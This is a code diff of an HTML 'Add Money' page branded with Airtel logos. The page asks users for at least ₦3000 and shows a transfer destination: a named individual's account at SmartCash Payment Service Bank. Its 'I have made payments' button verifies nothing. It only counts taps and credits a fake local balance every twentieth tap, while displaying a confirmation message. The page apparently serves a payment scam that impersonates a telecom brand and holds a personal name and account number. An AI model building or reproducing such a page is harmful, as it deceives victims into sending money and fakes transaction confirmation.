--- a/add_money.html
+++ b/add_money.html
@@ -1,4 +1,5 @@
-<!DOCTYPE html><html lang="en">
+<!DOCTYPE html>
+<html lang="en">
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
@@ -7,155 +8,191 @@
     body {
       margin: 0;
       font-family: Arial, sans-serif;
-      background-color: #fff;
+      background: #fff;
       overflow-x: hidden;
-      position: relative;
-    }.airtel-background {
-  position: fixed;
-  top: 0;
-  left: 0;
-  width: 100%;
-  height: 100%;
-  background: url('airtel-logo-blur.png') repeat;
-  background-size: 100px;
-  opacity: 0.05;
-  z-index: -1;
-  animation: floatLogos 60s linear infinite;
-}
+    }
 
-@keyframes floatLogos {
-  0% { background-position: 0 0; }
-  100% { background-position: 1000px 1000px; }
-}
+    .background-animation {
+      position: fixed;
+      top: 0;
+      left: 0;
+      width: 100%;
+      height: 100%;
+      background: rgba(255, 255, 255, 0.8);
+      overflow: hidden;
+      z-index: -1;
+    }
 
-.container {
-  max-width: 400px;
-  margin: 50px auto;
-  padding: 20px;
-  background-color: rgba(255, 255, 255, 0.95);
-  border-radius: 10px;
-  box-shadow: 0 4px 8px rgba(0,0,0,0.1);
-}
+    .airtel-piece {
+      position: absolute;
+      width: 20px;
+      height: 20px;
+      background-image: url("airtel.png"); /* <- Use small Airtel logo */
+      background-size: cover;
+      animation: float 15s infinite;
+      opacity: 0.2;
+    }
 
-.logo {
-  display: block;
-  margin: 0 auto 20px;
-  width: 100px;
-}
+    @keyframes float {
+      0% {
+        transform: translateY(100vh) rotate(0deg);
+        opacity: 0;
+      }
+      50% {
+        opacity: 0.3;
+      }
+      100% {
+        transform: translateY(-100vh) rotate(360deg);
+        opacity: 0;
+      }
+    }
 
-h2 {
-  text-align: center;
-  color: red;
-}
+    .container {
+      padding: 20px;
+      text-align: center;
+    }
 
-input[type="number"] {
-  width: 100%;
-  padding: 12px;
-  margin: 10px 0;
-  border: 1px solid #ccc;
-  border-radius: 5px;
-  font-size: 16px;
-}
+    .logo {
+      width: 80px;
+      margin: 10px auto;
+      display: block;
+    }
 
-button {
-  width: 100%;
-  padding: 12px;
-  background-color: red;
-  color: white;
-  font-size: 16px;
-  border: none;
-  border-radius: 5px;
-  cursor: pointer;
-}
+    .input-section,
+    .account-section {
+      background: #fff;
+      border-radius: 12px;
+      padding: 20px;
+      box-shadow: 0 5px 15px rgba(0,0,0,0.1);
+      max-width: 400px;
+      margin: 20px auto;
+    }
 
-button:hover {
-  background-color: darkred;
-}
+    input {
+      padding: 12px;
+      width: 80%;
+      font-size: 16px;
+      border: 1px solid #ccc;
+      border-radius: 8px;
+    }
 
-.account-details {
-  display: none;
-  text-align: center;
-  margin-top: 30px;
-}
+    button {
+      padding: 12px 24px;
+      margin-top: 15px;
+      font-size: 16px;
+      background-color: red;
+      color: #fff;
+      border: none;
+      border-radius: 8px;
+      cursor: pointer;
+    }
 
-.popup {
-  display: none;
-  background-color: rgba(0,0,0,0.8);
-  color: white;
-  padding: 15px;
-  position: fixed;
-  top: 30%;
-  left: 50%;
-  transform: translate(-50%, -50%);
-  border-radius: 10px;
-  z-index: 9999;
-  text-align: center;
-  animation: fadeIn 0.5s ease;
-}
+    .popup {
+      background-color: #fff3f3;
+      color: red;
+      padding: 10px;
+      margin-top: 10px;
+      border-radius: 8px;
+      display: none;
+    }
 
-@keyframes fadeIn {
-  from { opacity: 0; }
-  to { opacity: 1; }
-}
+    .account-section {
+      display: none;
+    }
 
+    .details {
+      font-size: 18px;
+      font-weight: bold;
+      margin: 10px 0;
+    }
+
+    .back-btn {
+      margin-top: 30px;
+      display: block;
+      text-align: center;
+    }
+
+    .back-btn a {
+      color: blue;
+      text-decoration: underline;
+      font-size: 16px;
+    }
   </style>
 </head>
 <body>
-  <div class="airtel-background"></div>  <div class="container">
-    <img src="airtel-logo.png" alt="Airtel Logo" class="logo" />
-    <h2>Add Money</h2>
-    <input type="number" id="amount" placeholder="Enter Amount (min ₦3000)" />
-    <button onclick="handleContinue()">Continue</button><div class="account-details" id="accountDetails">
-  <img src="airtel-logo.png" alt="Airtel Logo" style="width: 80px; margin-bottom: 10px;">
-  <p><strong>Send to:</strong></p>
-  <p><strong>Name:</strong> EMMANUEL OKWUNNA</p>
-  <p><strong>Bank:</strong> SmartCash Payment Service Bank</p>
-  <p><strong>Account Number:</strong> 812 489 0070</p>
-  <button onclick="confirmPayment()">I Have Made Payments</button>
-  <br><br>
-  <button onclick="goToDashboard()">Back to Dashboard</button>
-</div>
-
-  </div>  <div class="popup" id="popup">Please wait...</div>  <script>
-    let tapCount = parseInt(localStorage.getItem('tapCount')) || 0;
-
-    function handleContinue() {
-      const amount = document.getElementById('amount').value;
-      if (amount < 3000) {
-        showPopup('Please input a minimum of ₦3000');
-        return;
+  <div class="background-animation" id="bg">
+    <!-- Airtel logo particles -->
+    <script>
+      for (let i = 0; i < 50; i++) {
+        const logo = document.createElement('div');
+        logo.className = 'airtel-piece';
+        logo.style.left = `${Math.random() * 100}%`;
+        logo.style.top = `${Math.random() * 100}%`;
+        logo.style.animationDuration = `${10 + Math.random() * 10}s`;
+        document.getElementById('bg').appendChild(logo);
       }
-      showPopup('Please wait...');
-      setTimeout(() => {
-        document.getElementById('popup').style.display = 'none';
-        document.getElementById('accountDetails').style.display = 'block';
-      }, 2000);
+    </script>
+  </div>
+
+  <div class="container">
+    <img src="airtel.png" class="logo" alt="Airtel Logo" />
+
+    <div class="input-section" id="inputSection">
+      <h3>Enter Amount to Fund</h3>
+      <input type="number" id="amount" placeholder="Minimum ₦3000" />
+      <button onclick="validateAmount()">Continue</button>
+      <div class="popup" id="popup">Please enter minimum of ₦3000</div>
+    </div>
+
+    <div class="account-section" id="accountSection">
+      <img src="airtel.png" class="logo" alt="Airtel Logo" />
+      <div class="details">Name: EMMANUEL OKWUNNA</div>
+      <div class="details">Bank: SmartCash Payment Service Bank</div>
+      <div class="details">Account Number: 812 489 0070</div>
+      <button onclick="confirmPayment()">I have made payments</button>
+      <div class="popup" id="confirmMsg">Thank you. We are confirming your transaction...</div>
+    </div>
+
+    <div class="back-btn">
+      <a href="dashboard.html">← Back to Dashboard</a>
+    </div>
+  </div>
+
+  <script>
+    const popup = document.getElementById("popup");
+    const inputSection = document.getElementById("inputSection");
+    const accountSection = document.getElementById("accountSection");
+    const confirmMsg = document.getElementById("confirmMsg");
+
+    let tapCount = parseInt(localStorage.getItem("tapCount") || "0");
+    let balance = parseInt(localStorage.getItem("balance") || "0");
+
+    function validateAmount() {
+      const amount = document.getElementById("amount").value;
+      if (amount >= 3000) {
+        popup.style.display = "none";
+        inputSection.style.display = "none";
+        accountSection.style.display = "block";
+      } else {
+        popup.style.display = "block";
+      }
     }
 
     function confirmPayment() {
       tapCount++;
-      localStorage.setItem('tapCount', tapCount);
-      showPopup('Confirming your transaction, please wait...');
+      localStorage.setItem("tapCount", tapCount);
+
+      confirmMsg.style.display = "block";
+
+      if (tapCount % 20 === 0) {
+        balance += 3000;
+        localStorage.setItem("balance", balance);
+      }
+
       setTimeout(() => {
-        document.getElementById('popup').style.display = 'none';
-        if (tapCount % 20 === 0) {
-          let balance = parseInt(localStorage.getItem('balance')) || 0;
-          balance += 3000;
-          localStorage.setItem('balance', balance);
-          showPopup('₦3000 has been added to your wallet!');
-          setTimeout(() => document.getElementById('popup').style.display = 'none', 3000);
-        }
-      }, 2000);
+        confirmMsg.style.display = "none";
+      }, 3000);
     }
-
-    function showPopup(message) {
-      const popup = document.getElementById('popup');
-      popup.textContent = message;
-      popup.style.display = 'block';
-    }
-
-    function goToDashboard() {
-      window.location.href = 'dashboard.html';
-    }
-  </script></body>
-</html>
+  </script>
+</body>
+  </html>
